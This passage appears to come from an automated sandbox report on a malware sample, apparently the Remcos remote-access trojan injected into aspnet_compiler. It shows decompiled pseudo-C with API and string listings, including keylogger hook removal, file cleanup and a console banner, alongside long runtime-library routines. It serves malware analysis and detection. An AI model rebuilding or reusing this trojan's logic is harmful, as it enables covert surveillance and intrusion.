                    				E00402073(_t7, _t18 - 0x18, _t11, _t16, "!");
                    				E0041A04A(_t7, _t12);
                    				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
                    				Sleep(0x2710);
                    				return PlaySoundW(0, 0, 0);
                    			}

                    APIs
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041994D
                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041995B
                    • Sleep.KERNEL32(00002710), ref: 00419962
                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041996B
                    Strings
                    • API ID: PlaySound$HandleLocalModuleSleepTime
                    • String ID: Alarm triggered
                    • API String ID: 614609389-2816303416

                    C-Code - Quality: 54%
                    			E0041B663() {
                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
                    				void* _t9;
                    				void* _t12;
                    
                    				_t9 = GetStdHandle(0xfffffff5);
                    				GetConsoleScreenBufferInfo(_t9,  &_v28);
                    				SetConsoleTextAttribute(_t9, 0xc);
                    				_push("\n\t ______                              \n\t(_____ \\                             \n\t _____) )_____ ____   ____ ___   ___ \n\t|  __  /| ___ |    \\ / ___) _ \\ /___)\n\t| |  \\ \\| ____| | | ( (__| |_| |___ |\n\t|_|   |_|_____)_|_|_|\\____)___/(___/ \n");
                    				E00406874(_t12);
                    				return SetConsoleTextAttribute(_t9, _v28.wAttributes & 0x0000ffff);
                    			}

                    APIs
                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041B6F8), ref: 0041B66D
                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B67A
                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041B6F8), ref: 0041B687
                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B69A
                    Strings
                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041B68D
                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                    • API String ID: 3024135584-2418719853

                    C-Code - Quality: 80%
                    			E0040AE1C() {
                    				signed int _t15;
                    
                    				 *0x473089 = 0;
                    				TerminateThread(E00409880, 0);
                    				if( *0x473040 != 0) {
                    					__eax = UnhookWindowsHookEx(__eax);
                    					 *0x473040 = 0;
                    					__eax = TerminateThread(E0040986A, 0);
                    				}
                    				_pop(0);
                    				_push(0);
                    				_t25 = DeleteFileW(E00401EE4(0x4730a0));
                    				_t15 = 0 | DeleteFileW(E00401EE4(0x4730a0)) != 0x00000000;
                    				if(E00406E2B(_t25) != 0) {
                    					RemoveDirectoryW(E00401EE4(0x4730b8));
                    				}
                    				return _t15;
                    			}

                    APIs
                    • TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                    • UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                    • TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                    Strings
                    • API ID: TerminateThread$HookUnhookWindows
                    • String ID: @0G$pth_unenc
                    • API String ID: 3123878439-155138683

                    C-Code - Quality: 96%
                    			E0043FC6A(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				char _v16;
                    				int _v20;
                    				int _v24;
                    				char* _v28;
                    				int _v32;
                    				char _v36;
                    				intOrPtr _v44;
                    				char _v48;
                    				signed int _t59;
                    				char* _t61;
                    				intOrPtr _t63;
                    				int _t64;
                    				intOrPtr* _t65;
                    				signed int _t68;
                    				intOrPtr* _t71;
                    				short* _t73;
                    				int _t74;
                    				int _t76;
                    				char _t78;
                    				short* _t83;
                    				short _t85;
                    				int _t91;
                    				int _t93;
                    				char* _t98;
                    				int _t103;
                    				char* _t105;
                    				void* _t106;
                    				intOrPtr _t108;
                    				intOrPtr _t109;
                    				int _t110;
                    				short* _t113;
                    				int _t114;
                    				int _t116;
                    				signed int _t117;
                    
                    				_t106 = __edx;
                    				_t59 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t59 ^ _t117;
                    				_t61 = _a4;
                    				_t91 = _a12;
                    				_t116 = 0;
                    				_v28 = _t61;
                    				_v20 = 0;
                    				_t113 = _a8;
                    				_v24 = _t113;
                    				if(_t61 == 0 || _t91 != 0) {
                    					if(_t113 != 0) {
                    						E004390B7(_t91,  &_v48, _t106, _a16);
                    						_t98 = _v28;
                    						if(_t98 == 0) {
                    							_t63 = _v44;
                    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
                    								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
                    								if(_t64 == 0 || _v20 != _t116) {
                    									L55:
                    									_t65 = E0043EEAD();
                    									_t114 = _t113 | 0xffffffff;
                    									 *_t65 = 0x2a;
                    									goto L56;
                    								} else {
                    									_t53 = _t64 - 1; // -1
                    									_t114 = _t53;
                    									L56:
                    									if(_v36 != 0) {
                    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                    									}
                    									goto L59;
                    								}
                    							}
                    							_t68 =  *_t113 & 0x0000ffff;
                    							if(_t68 == 0) {
                    								L51:
                    								_t114 = _t116;
                    								goto L56;
                    							}
                    							while(_t68 <= 0xff) {
                    								_t113 =  &(_t113[1]);
                    								_t116 = _t116 + 1;
                    								_t68 =  *_t113 & 0x0000ffff;
                    								if(_t68 != 0) {
                    									continue;
                    								}
                    								goto L51;
                    							}
                    							goto L55;
                    						}
                    						_t108 = _v44;
                    						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
                    							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                    								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
                    								if(_t114 == 0) {
                    									if(_v20 != _t116 || GetLastError() != 0x7a) {
                    										L45:
                    										_t71 = E0043EEAD();
                    										_t116 = _t116 | 0xffffffff;
                    										 *_t71 = 0x2a;
                    										goto L51;
                    									} else {
                    										if(_t91 == 0) {
                    											goto L56;
                    										}
                    										_t73 = _v24;
                    										while(1) {
                    											_t109 = _v44;
                    											_t103 =  *(_t109 + 4);
                    											if(_t103 > 5) {
                    												_t103 = 5;
                    											}
                    											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
                    											_t93 = _a12;
                    											_t110 = _t74;
                    											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
                    												goto L55;
                    											}
                    											if(_t110 + _t114 > _t93) {
                    												goto L56;
                    											}
                    											_t76 = _t116;
                    											_v32 = _t76;
                    											if(_t110 <= 0) {
                    												L43:
                    												_t73 = _v24 + 2;
                    												_v24 = _t73;
                    												if(_t114 < _t93) {
                    													continue;
                    												}
                    												goto L56;
                    											}
                    											_t105 = _v28;
                    											while(1) {
                    												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
                    												 *((char*)(_t105 + _t114)) = _t78;
                    												if(_t78 == 0) {
                    													goto L56;
                    												}
                    												_t76 = _v32 + 1;
                    												_t114 = _t114 + 1;
                    												_v32 = _t76;
                    												if(_t76 < _t110) {
                    													continue;
                    												}
                    												goto L43;
                    											}
                    											goto L56;
                    										}
                    										goto L55;
                    									}
                    								}
                    								if(_v20 != _t116) {
                    									goto L45;
                    								}
                    								_t28 = _t114 - 1; // -1
                    								_t116 = _t28;
                    								goto L51;
                    							}
                    							if(_t91 == 0) {
                    								L21:
                    								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
                    								if(_t116 == 0 || _v20 != 0) {
                    									goto L45;
                    								} else {
                    									if(_v28[_t116 - 1] == 0) {
                    										_t116 = _t116 - 1;
                    									}
                    									goto L51;
                    								}
                    							}
                    							_t83 = _t113;
                    							_v24 = _t91;
                    							while( *_t83 != _t116) {
                    								_t83 =  &(_t83[1]);
                    								_t16 =  &_v24;
                    								 *_t16 = _v24 - 1;
                    								if( *_t16 != 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							if(_v24 != _t116 &&  *_t83 == _t116) {
                    								_t91 = (_t83 - _t113 >> 1) + 1;
                    							}
                    							goto L21;
                    						}
                    						if(_t91 == 0) {
                    							goto L51;
                    						}
                    						while( *_t113 <= 0xff) {
                    							_t98[_t116] =  *_t113;
                    							_t85 =  *_t113;
                    							_t113 =  &(_t113[1]);
                    							if(_t85 == 0) {
                    								goto L51;
                    							}
                    							_t116 = _t116 + 1;
                    							if(_t116 < _t91) {
                    								continue;
                    							}
                    							goto L51;
                    						}
                    						goto L45;
                    					}
                    					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    					E0043A5BB();
                    					goto L59;
                    				} else {
                    					L59:
                    					return E004338BB(_v8 ^ _t117);
                    				}
                    			}







































                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                    • Instruction ID: 060016eacbcb527956992f75cf2bc0db82b48ac299cd878c71906e1bf1d9a011
                    • Opcode Fuzzy Hash: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                    • Instruction Fuzzy Hash: 9D71F432D002169BCF218F55C845ABFBB75EF49310F14613BE811672A2D7789D49CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E004435FC(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				signed int _v56;
                    				char _v276;
                    				short _v278;
                    				short _v280;
                    				char _v448;
                    				signed int _v452;
                    				signed int _v456;
                    				short _v458;
                    				intOrPtr _v460;
                    				intOrPtr _v464;
                    				signed int _v468;
                    				signed int _v472;
                    				intOrPtr _v508;
                    				char _v536;
                    				signed int _v540;
                    				intOrPtr _v544;
                    				signed int _v556;
                    				char _v708;
                    				signed int _v712;
                    				signed int _v716;
                    				short _v718;
                    				signed int* _v720;
                    				signed int _v724;
                    				signed int _v728;
                    				signed int _v732;
                    				signed int* _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _v748;
                    				signed int _v752;
                    				char _v820;
                    				char _v1248;
                    				char _v1256;
                    				intOrPtr _v1276;
                    				signed int _v1292;
                    				signed int _t241;
                    				void* _t244;
                    				signed int _t247;
                    				signed int _t249;
                    				signed int _t255;
                    				signed int _t256;
                    				signed int _t257;
                    				signed int _t258;
                    				signed int _t259;
                    				signed int _t261;
                    				signed int _t263;
                    				void* _t265;
                    				signed int _t266;
                    				signed int _t267;
                    				signed int _t268;
                    				signed int _t270;
                    				signed int _t273;
                    				signed int _t280;
                    				signed int _t281;
                    				signed int _t282;
                    				intOrPtr _t283;
                    				signed int _t286;
                    				signed int _t290;
                    				signed int _t291;
                    				intOrPtr _t293;
                    				signed int _t296;
                    				signed int _t297;
                    				signed int _t299;
                    				signed int _t319;
                    				signed int _t320;
                    				signed int _t323;
                    				signed int _t328;
                    				void* _t330;
                    				signed int _t332;
                    				void* _t333;
                    				intOrPtr _t334;
                    				signed int _t339;
                    				signed int _t340;
                    				intOrPtr* _t343;
                    				signed int _t357;
                    				signed int _t359;
                    				signed int _t361;
                    				intOrPtr* _t362;
                    				signed int _t364;
                    				signed int _t370;
                    				intOrPtr* _t374;
                    				intOrPtr* _t377;
                    				void* _t380;
                    				intOrPtr* _t381;
                    				intOrPtr* _t382;
                    				signed int _t393;
                    				signed int _t396;
                    				intOrPtr* _t397;
                    				signed int _t399;
                    				signed int* _t403;
                    				intOrPtr* _t410;
                    				intOrPtr* _t411;
                    				signed int _t421;
                    				short _t422;
                    				void* _t424;
                    				signed int _t425;
                    				signed int _t427;
                    				intOrPtr _t428;
                    				signed int _t431;
                    				intOrPtr _t432;
                    				signed int _t434;
                    				signed int _t437;
                    				intOrPtr _t443;
                    				signed int _t444;
                    				signed int _t446;
                    				signed int _t447;
                    				signed int _t450;
                    				signed int _t452;
                    				signed int _t456;
                    				signed int* _t457;
                    				intOrPtr* _t458;
                    				short _t459;
                    				void* _t461;
                    				signed int _t463;
                    				signed int _t465;
                    				void* _t467;
                    				void* _t468;
                    				void* _t470;
                    				signed int _t471;
                    				void* _t472;
                    				void* _t474;
                    				signed int _t475;
                    				void* _t477;
                    				void* _t479;
                    				intOrPtr _t491;
                    
                    				_t420 = __edx;
                    				_t461 = _t467;
                    				_t468 = _t467 - 0xc;
                    				_push(__ebx);
                    				_push(__esi);
                    				_v12 = 1;
                    				_t357 = E00444A38(__ecx, 0x6a6);
                    				_t240 = 0;
                    				_pop(_t370);
                    				if(_t357 == 0) {
                    					L20:
                    					return _t240;
                    				} else {
                    					_push(__edi);
                    					_t2 = _t357 + 4; // 0x4
                    					_t427 = _t2;
                    					 *_t427 = 0;
                    					 *_t357 = 1;
                    					_t443 = _a4;
                    					_t4 = _t443 + 0x30; // 0x442dfb
                    					_t241 = _t4;
                    					_push( *_t241);
                    					_v16 = _t241;
                    					_push(0x45b570);
                    					_push( *0x45b42c);
                    					E0044353B(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                    					_t470 = _t468 + 0x18;
                    					_v8 = 0x45b42c;
                    					while(1) {
                    						L2:
                    						_t244 = E0044E807(_t427, 0x351, ";");
                    						_t471 = _t470 + 0xc;
                    						if(_t244 != 0) {
                    							break;
                    						} else {
                    							_t8 = _v16 + 0x10; // 0x10
                    							_t410 = _t8;
                    							_t339 =  *_v16;
                    							_v16 = _t410;
                    							_t411 =  *_t410;
                    							goto L4;
                    						}
                    						while(1) {
                    							L4:
                    							_t420 =  *_t339;
                    							if(_t420 !=  *_t411) {
                    								break;
                    							}
                    							if(_t420 == 0) {
                    								L8:
                    								_t340 = 0;
                    							} else {
                    								_t420 =  *((intOrPtr*)(_t339 + 2));
                    								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                    									break;
                    								} else {
                    									_t339 = _t339 + 4;
                    									_t411 = _t411 + 4;
                    									if(_t420 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							asm("sbb eax, eax");
                    							_t370 = _v8 + 0xc;
                    							_v8 = _t370;
                    							_v12 = _v12 &  !( ~_t340);
                    							_t343 = _v16;
                    							_v16 = _t343;
                    							_push( *_t343);
                    							_push(0x45b570);
                    							_push( *_t370);
                    							E0044353B(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                    							_t470 = _t471 + 0x18;
                    							if(_v8 < 0x45b45c) {
                    								goto L2;
                    							} else {
                    								if(_v12 != 0) {
                    									E00445002(_t357);
                    									_t31 = _t443 + 0x28; // 0x30ff068b
                    									_t434 = _t427 | 0xffffffff;
                    									__eflags =  *_t31;
                    									if(__eflags != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(__eflags == 0) {
                    											_t32 = _t443 + 0x28; // 0x30ff068b
                    											E00445002( *_t32);
                    										}
                    									}
                    									_t33 = _t443 + 0x24; // 0x30ff0c46
                    									__eflags =  *_t33;
                    									if( *_t33 != 0) {
                    										asm("lock xadd [eax], edi");
                    										__eflags = _t434 == 1;
                    										if(_t434 == 1) {
                    											_t34 = _t443 + 0x24; // 0x30ff0c46
                    											E00445002( *_t34);
                    										}
                    									}
                    									 *(_t443 + 0x24) = 0;
                    									 *(_t443 + 0x1c) = 0;
                    									 *(_t443 + 0x28) = 0;
                    									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                    									_t39 = _t443 + 0x40; // 0x10468b00
                    									_t240 =  *_t39;
                    								} else {
                    									_t20 = _t443 + 0x28; // 0x30ff068b
                    									_t437 = _t427 | 0xffffffff;
                    									_t491 =  *_t20;
                    									if(_t491 != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(_t491 == 0) {
                    											_t21 = _t443 + 0x28; // 0x30ff068b
                    											E00445002( *_t21);
                    										}
                    									}
                    									_t22 = _t443 + 0x24; // 0x30ff0c46
                    									if( *_t22 != 0) {
                    										asm("lock xadd [eax], edi");
                    										if(_t437 == 1) {
                    											_t23 = _t443 + 0x24; // 0x30ff0c46
                    											E00445002( *_t23);
                    										}
                    									}
                    									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                    									_t26 = _t357 + 4; // 0x4
                    									_t240 = _t26;
                    									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                    									 *(_t443 + 0x28) = _t357;
                    									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                    								}
                    								goto L20;
                    							}
                    							goto L130;
                    						}
                    						asm("sbb eax, eax");
                    						_t340 = _t339 | 0x00000001;
                    						__eflags = _t340;
                    						goto L10;
                    					}
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043A5E8();
                    					asm("int3");
                    					_push(_t461);
                    					_t463 = _t471;
                    					_t472 = _t471 - 0x1d0;
                    					_t247 =  *0x46f00c; // 0x54ba778e
                    					_v56 = _t247 ^ _t463;
                    					_t249 = _v40;
                    					_push(_t357);
                    					_push(_t443);
                    					_t444 = _v36;
                    					_push(_t427);
                    					_t428 = _v44;
                    					_v508 = _t428;
                    					__eflags = _t249;
                    					if(_t249 == 0) {
                    						_v456 = 1;
                    						_v468 = 0;
                    						_t359 = 0;
                    						_v452 = 0;
                    						__eflags = _t444;
                    						if(__eflags == 0) {
                    							L79:
                    							E004435FC(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                    							goto L80;
                    						} else {
                    							__eflags =  *_t444 - 0x4c;
                    							if( *_t444 != 0x4c) {
                    								L58:
                    								_push(0);
                    								_t255 = E004431C4(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                    								_t474 = _t472 + 0x18;
                    								__eflags = _t255;
                    								if(_t255 != 0) {
                    									_t370 = 0;
                    									__eflags = 0;
                    									_t76 = _t428 + 0x20; // 0x442deb
                    									_t421 = _t76;
                    									_t446 = 0;
                    									_v452 = _t421;
                    									do {
                    										__eflags = _t446;
                    										if(_t446 == 0) {
                    											L73:
                    											_t256 = _v456;
                    										} else {
                    											_t374 =  *_t421;
                    											_t257 =  &_v276;
                    											while(1) {
                    												__eflags =  *_t257 -  *_t374;
                    												_t428 = _v464;
                    												if( *_t257 !=  *_t374) {
                    													break;
                    												}
                    												__eflags =  *_t257;
                    												if( *_t257 == 0) {
                    													L66:
                    													_t370 = 0;
                    													_t258 = 0;
                    												} else {
                    													_t422 =  *((intOrPtr*)(_t257 + 2));
                    													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                    													_v458 = _t422;
                    													_t421 = _v452;
                    													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                    														break;
                    													} else {
                    														_t257 = _t257 + 4;
                    														_t374 = _t374 + 4;
                    														__eflags = _v458;
                    														if(_v458 != 0) {
                    															continue;
                    														} else {
                    															goto L66;
                    														}
                    													}
                    												}
                    												L68:
                    												__eflags = _t258;
                    												if(_t258 == 0) {
                    													_t359 = _t359 + 1;
                    													__eflags = _t359;
                    													goto L73;
                    												} else {
                    													_t259 =  &_v276;
                    													_push(_t259);
                    													_push(_t446);
                    													_push(_t428);
                    													L83();
                    													_t421 = _v452;
                    													_t474 = _t474 + 0xc;
                    													__eflags = _t259;
                    													if(_t259 == 0) {
                    														_t370 = 0;
                    														_t256 = 0;
                    														_v456 = 0;
                    													} else {
                    														_t359 = _t359 + 1;
                    														_t370 = 0;
                    														goto L73;
                    													}
                    												}
                    												goto L74;
                    											}
                    											asm("sbb eax, eax");
                    											_t258 = _t257 | 0x00000001;
                    											_t370 = 0;
                    											__eflags = 0;
                    											goto L68;
                    										}
                    										L74:
                    										_t446 = _t446 + 1;
                    										_t421 = _t421 + 0x10;
                    										_v452 = _t421;
                    										__eflags = _t446 - 5;
                    									} while (_t446 <= 5);
                    									__eflags = _t256;
                    									if(__eflags != 0) {
                    										goto L79;
                    									} else {
                    										__eflags = _t359;
                    										goto L77;
                    									}
                    								}
                    								goto L80;
                    							} else {
                    								__eflags =  *(_t444 + 2) - 0x43;
                    								if( *(_t444 + 2) != 0x43) {
                    									goto L58;
                    								} else {
                    									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                    									if( *((short*)(_t444 + 4)) != 0x5f) {
                    										goto L58;
                    									} else {
                    										while(1) {
                    											_t261 = E0044F967(_t444, 0x45b568);
                    											_t361 = _t261;
                    											_v472 = _t361;
                    											_pop(_t376);
                    											__eflags = _t361;
                    											if(_t361 == 0) {
                    												break;
                    											}
                    											_t263 = _t261 - _t444;
                    											__eflags = _t263;
                    											_v456 = _t263 >> 1;
                    											if(_t263 == 0) {
                    												break;
                    											} else {
                    												_t265 = 0x3b;
                    												__eflags =  *_t361 - _t265;
                    												if( *_t361 == _t265) {
                    													break;
                    												} else {
                    													_t431 = _v456;
                    													_t362 = 0x45b42c;
                    													_v460 = 1;
                    													do {
                    														_t266 = E0044F92D( *_t362, _t444, _t431);
                    														_t472 = _t472 + 0xc;
                    														__eflags = _t266;
                    														if(_t266 != 0) {
                    															goto L45;
                    														} else {
                    															_t377 =  *_t362;
                    															_t420 = _t377 + 2;
                    															do {
                    																_t334 =  *_t377;
                    																_t377 = _t377 + 2;
                    																__eflags = _t334 - _v468;
                    															} while (_t334 != _v468);
                    															_t376 = _t377 - _t420 >> 1;
                    															__eflags = _t431 - _t377 - _t420 >> 1;
                    															if(_t431 != _t377 - _t420 >> 1) {
                    																goto L45;
                    															}
                    														}
                    														break;
                    														L45:
                    														_v460 = _v460 + 1;
                    														_t362 = _t362 + 0xc;
                    														__eflags = _t362 - 0x45b45c;
                    													} while (_t362 <= 0x45b45c);
                    													_t359 = _v472 + 2;
                    													_t267 = E0044F8DD(_t376, _t359, ";");
                    													_t428 = _v464;
                    													_t447 = _t267;
                    													_pop(_t380);
                    													__eflags = _t447;
                    													if(_t447 != 0) {
                    														L48:
                    														__eflags = _v460 - 5;
                    														if(_v460 > 5) {
                    															_t268 = _v452;
                    															goto L54;
                    														} else {
                    															_push(_t447);
                    															_t270 = E0044E949(_t380,  &_v276, 0x83, _t359);
                    															_t475 = _t472 + 0x10;
                    															__eflags = _t270;
                    															if(_t270 != 0) {
                    																L82:
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																E0043A5E8();
                    																asm("int3");
                    																_push(_t463);
                    																_t465 = _t475;
                    																_t273 =  *0x46f00c; // 0x54ba778e
                    																_v556 = _t273 ^ _t465;
                    																_push(_t359);
                    																_t364 = _v540;
                    																_push(_t447);
                    																_push(_t428);
                    																_t432 = _v544;
                    																_v1292 = _t364;
                    																_v1276 = E00446A95(_t364, _t380, _t420) + 0x278;
                    																_push( &_v1256);
                    																_t280 = E004431C4(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                    																_t477 = _t475 - 0x2e4 + 0x18;
                    																__eflags = _t280;
                    																if(_t280 != 0) {
                    																	_t101 = _t364 + 2; // 0x6
                    																	_t450 = _t101 << 4;
                    																	__eflags = _t450;
                    																	_t281 =  &_v280;
                    																	_v724 = _t450;
                    																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                    																	while(1) {
                    																		_v712 = _v712 & 0x00000000;
                    																		__eflags =  *_t281 -  *_t381;
                    																		_t452 = _v724;
                    																		if( *_t281 !=  *_t381) {
                    																			break;
                    																		}
                    																		__eflags =  *_t281;
                    																		if( *_t281 == 0) {
                    																			L91:
                    																			_t282 = _v712;
                    																		} else {
                    																			_t459 =  *((intOrPtr*)(_t281 + 2));
                    																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                    																			_v718 = _t459;
                    																			_t452 = _v724;
                    																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                    																				break;
                    																			} else {
                    																				_t281 = _t281 + 4;
                    																				_t381 = _t381 + 4;
                    																				__eflags = _v718;
                    																				if(_v718 != 0) {
                    																					continue;
                    																				} else {
                    																					goto L91;
                    																				}
                    																			}
                    																		}
                    																		L93:
                    																		__eflags = _t282;
                    																		if(_t282 != 0) {
                    																			_t382 =  &_v280;
                    																			_t424 = _t382 + 2;
                    																			do {
                    																				_t283 =  *_t382;
                    																				_t382 = _t382 + 2;
                    																				__eflags = _t283 - _v712;
                    																			} while (_t283 != _v712);
                    																			_v728 = (_t382 - _t424 >> 1) + 1;
                    																			_t286 = E00444A38(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                    																			_v740 = _t286;
                    																			__eflags = _t286;
                    																			if(_t286 == 0) {
                    																				goto L84;
                    																			} else {
                    																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                    																				_t125 = _t364 * 4; // 0xcea3
                    																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
                    																				_t128 = _t432 + 8; // 0x8b56ff8b
                    																				_v748 =  *_t128;
                    																				_t391 =  &_v280;
                    																				_v720 = _t286 + 4;
                    																				_t290 = E004463E1(_t286 + 4, _v728,  &_v280);
                    																				_t479 = _t477 + 0xc;
                    																				__eflags = _t290;
                    																				if(_t290 != 0) {
                    																					_t291 = _v712;
                    																					_push(_t291);
                    																					_push(_t291);
                    																					_push(_t291);
                    																					_push(_t291);
                    																					_push(_t291);
                    																					E0043A5E8();
                    																					asm("int3");
                    																					_t293 =  *0x470518; // 0x0
                    																					return _t293;
                    																				} else {
                    																					__eflags = _v280 - 0x43;
                    																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                    																					if(_v280 != 0x43) {
                    																						L102:
                    																						_t296 = E00442ED1(_t364, _t391, _t432,  &_v708);
                    																						_t393 = _v712;
                    																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                    																					} else {
                    																						__eflags = _v278;
                    																						if(_v278 != 0) {
                    																							goto L102;
                    																						} else {
                    																							_t393 = _v712;
                    																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                    																						}
                    																					}
                    																					__eflags = _t364 - 2;
                    																					if(_t364 != 2) {
                    																						__eflags = _t364 - 1;
                    																						if(_t364 != 1) {
                    																							__eflags = _t364 - 5;
                    																							if(_t364 == 5) {
                    																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                    																							}
                    																						} else {
                    																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                    																						}
                    																					} else {
                    																						_t457 = _v736;
                    																						_t425 = _t393;
                    																						_t403 = _t457;
                    																						 *(_t432 + 8) = _v716;
                    																						_v720 = _t457;
                    																						_v728 = _t457[8];
                    																						_v716 = _t457[9];
                    																						while(1) {
                    																							_t154 = _t432 + 8; // 0x8b56ff8b
                    																							__eflags =  *_t154 -  *_t403;
                    																							if( *_t154 ==  *_t403) {
                    																								break;
                    																							}
                    																							_t458 = _v720;
                    																							_t425 = _t425 + 1;
                    																							_t328 =  *_t403;
                    																							 *_t458 = _v728;
                    																							_v716 = _t403[1];
                    																							_t403 = _t458 + 8;
                    																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                    																							_t364 = _v752;
                    																							_t457 = _v736;
                    																							_v728 = _t328;
                    																							_v720 = _t403;
                    																							__eflags = _t425 - 5;
                    																							if(_t425 < 5) {
                    																								continue;
                    																							} else {
                    																							}
                    																							L110:
                    																							__eflags = _t425 - 5;
                    																							if(__eflags == 0) {
                    																								_t178 = _t432 + 8; // 0x8b56ff8b
                    																								_t319 = E0044F9AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x45b4e8, 0x7f,  &_v536,  *_t178, 1);
                    																								_t479 = _t479 + 0x1c;
                    																								__eflags = _t319;
                    																								_t320 = _v712;
                    																								if(_t319 == 0) {
                    																									_t457[1] = _t320;
                    																								} else {
                    																									do {
                    																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                    																										_t320 = _t320 + 1;
                    																										__eflags = _t320 - 0x7f;
                    																									} while (_t320 < 0x7f);
                    																									_t323 = E004358BA( &_v536,  *0x46f170, 0xfe);
                    																									_t479 = _t479 + 0xc;
                    																									__eflags = _t323;
                    																									_t457[1] = 0 | _t323 == 0x00000000;
                    																								}
                    																								_t193 = _t432 + 8; // 0x8b56ff8b
                    																								 *_t457 =  *_t193;
                    																							}
                    																							 *(_t432 + 0x18) = _t457[1];
                    																							goto L121;
                    																						}
                    																						__eflags = _t425;
                    																						if(_t425 != 0) {
                    																							 *_t457 =  *(_t457 + _t425 * 8);
                    																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                    																							 *(_t457 + _t425 * 8) = _v728;
                    																							 *(_t457 + 4 + _t425 * 8) = _v716;
                    																						}
                    																						goto L110;
                    																					}
                    																					L121:
                    																					_t297 = _t364 * 0xc;
                    																					_t200 = _t297 + 0x45b428; // 0x40f943
